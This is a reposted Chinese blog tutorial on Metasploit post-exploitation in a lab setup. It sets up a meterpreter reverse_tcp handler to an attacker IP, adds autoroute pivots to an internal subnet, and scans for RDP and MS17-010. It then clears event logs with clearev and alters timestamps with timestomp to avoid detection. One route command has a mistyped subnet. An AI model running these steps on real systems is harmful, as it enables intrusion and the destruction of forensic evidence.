前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >MSF后渗透利用整理|MSF命令大全三

MSF后渗透利用整理|MSF命令大全三

作者头像
洛米唯熊
发布2019-07-25 14:57:57
1.2K0
发布2019-07-25 14:57:57
举报
文章被收录于专栏:洛米唯熊洛米唯熊

八、 路由设置

实验机:

MSF攻击机:202.192.29.17

跳板机:202.192.29.45

内网目标机:192.168.118.129

这里从我们已经拿下了跳板机开始,我们直接使用msfvenom传给跳板机点击,生成一个session:

设置好msf配置信息:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

show options

set LHOST 202.192.29.17

set LPORT 4444

run

获取到shell后如果出现乱码,使用chcp命令:

1.route

查询内网本地路由查询,得到内网网段地址为:192.168.118.0/24

接下来我们需要添加去往目标内网网段(192.168.118.0/24)的静态路由,使用run autoroute -s 202.192.118.0/24添加,使用run autoroute -p查看是否添加成功:

设置好路由之后,我们就可以对内网进行扫描了,做一个简单的测试,扫描内网的3389端口:

我们试着内网主机进行扫描,查看是否存在ms17_010漏洞:

发现192.168.118.129这台机子有可能存在漏洞,接着便可以实施进一步攻击

九、清除痕迹

1.clearev

在渗透入侵的过程中难免会留下一下日志信息痕迹,我们可以使用此命令来擦除留下的痕迹:

2.timestomp

将时间统一,减少被发现的概率

3.systeminfo

查看是否少了补丁

本文参与 腾讯云自媒体分享计划,分享自微信公众号。
原始发表:2019-04-25,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 洛米唯熊 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体分享计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
目录
  • 八、 路由设置
  • 九、清除痕迹
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档